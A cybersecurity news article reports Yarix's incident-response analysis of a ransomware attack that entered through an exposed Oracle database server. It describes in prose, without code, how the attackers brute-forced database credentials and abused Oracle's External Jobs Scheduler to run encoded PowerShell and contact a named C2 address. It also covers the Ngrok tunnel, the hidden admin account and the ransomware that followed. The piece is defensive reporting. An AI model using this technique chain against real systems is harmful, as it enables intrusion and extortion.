The Database Was the Door: A Ransomware Attack Began with an Exposed Oracle Serve
Ddos 
Yarix’s Incident Response Team (YIR) has published an in-depth analysis of a targeted intrusion that leveraged an exposed Oracle Database Scheduler function to gain access to corporate infrastructure.
The attack began with repeated login attempts against an Oracle Database Server. According to YIR, “the entry point detected was the use of a function of Oracle DBS, an exposed service active on their Database Server, which allowed the execution of commands remotely.”
Logs revealed that after a series of failed login attempts, the threat actor successfully authenticated with elevated “SYSDBA” privileges. YIR noted that, “this evidence, which was no longer returning an error for using incorrect credentials, represented a symptom that the TA had plausibly obtained valid credentials for access to the database.”
Once inside, the attacker used Oracle’s External Jobs Scheduler (extjobo.exe) to execute commands with system-level privileges. This allowed them to drop batch scripts and run Base64-encoded PowerShell commands that reached out to a Command-and-Control (C2) server.
YIR explained: “The correlation between the evidence of the execution of the External Job Scheduler detected through other artifacts obtained from the system, and the almost simultaneous execution of Base64-encoded powershell commands… allowed us to affirm that even in this first instance ‘extjobo.exe’ was used for the execution of remote commands.”
One of these commands downloaded a payload from 80.94.95.227:5555, an IP address under the attacker’s control. Investigators also found links to public GitHub code designed to create TCP reverse shells, suggesting the adversary borrowed or adapted existing offensive tools.
The attackers next deployed Ngrok, a legitimate tunneling utility, to establish an encrypted connection between their system and the compromised server. YIR observed, “the TA used it to establish an encrypted HTTPS tunnel, through which traffic between its device and the compromised database server passed.”
A configuration file containing the Ngrok authentication token was created directly on the victim’s server, enabling persistent, covert access over RDP (Remote Desktop Protocol).
With persistence in place, the adversary escalated privileges by creating a new local account named Admine$ and adding it to the administrators group. Tools like Process Hacker were dropped to assist in credential harvesting and process manipulation.
Finally, the attackers staged and executed ransomware. YIR detailed that, “the encryption took place, once the privilege escalation was performed, through the ransomware file ‘win.exe’, which was present at the path ‘C:\PerfLogs\win.exe’.”
The ransomware created scheduled tasks for persistence, generated ransom notes titled Elons_Help.txt, and attempted to erase traces by purging recycle bin directories and deleting executed payloads.
Attackers combined credential brute-forcing, legitimate administrative features (Oracle External Jobs), tunneling tools (Ngrok), and custom ransomware to achieve their objectives.
As Yarix concludes, incident responders must expect adversaries to “exploit the foothold obtained in the corporate infrastructure to extend control within it for malicious purposes.” Proactive patching, strict service exposure policies, and detailed log retention remain vital defenses against such attacks.
Related Posts:
- Microsoft 365 Startup Boost: Faster Apps, But Is It On by Default Now?
- CISA Sounds the Alarm on Actively Exploited Apple and Oracle Zero-Days
- Oracle Discloses Second Hack (Client Login Data)
- Oracle April 2025 CPU: 378 Security Patches Released
- CISA Warns of Credential Risks Tied to Oracle Cloud Breach
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
